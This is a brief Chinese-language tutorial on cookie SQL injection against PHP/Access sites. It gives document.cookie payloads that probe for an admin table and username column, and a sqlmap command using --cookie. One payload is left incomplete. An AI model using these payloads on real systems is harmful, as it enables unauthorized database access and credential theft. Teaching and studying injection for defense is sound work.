注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!
一、Cookie注入简介
此处Cookie注入的条件
在php中$_REQUEST[]接受传参的时候,接收post、get、cookie传参从而导致cookie注入
php<5.4 接受cookie传参
二、怎么修改Cookie
1.抓包修改Cookie值
2.控制台输入Cookie值
document.cookie="id="+escape("语句")
document.cookie 是用来设置cookie的
Cookie名字为id
escape 是一个编码函数,这个函数会进行URL编码
3.F12 -> 储存 -> cookie
三、Cookie注入步骤(Access数据库)
URL栏接受数据的时候先接受RUL栏中的传参,然后再接收cookie里的传参,所以在注入的时候应该清空URL栏的传参,在回车
方法一:
不知道表名,我们可以猜admin表是否存在(burp跑sqlmap下的data文的txt)
document.cookie="id="+escape("666 and exists( select * from admin)")
不知道字段名,我们可以猜username字段是否存在admin表中
document.cookie="id="+escape("666 and exists(select username from admin)")
找显错位
document.cookie="id="+escape()
方法二:
python sqlmap.py -u "https://127.0.0.1/xxx.php" --cookie "sb=123" --level 3 -- risk 2
-batch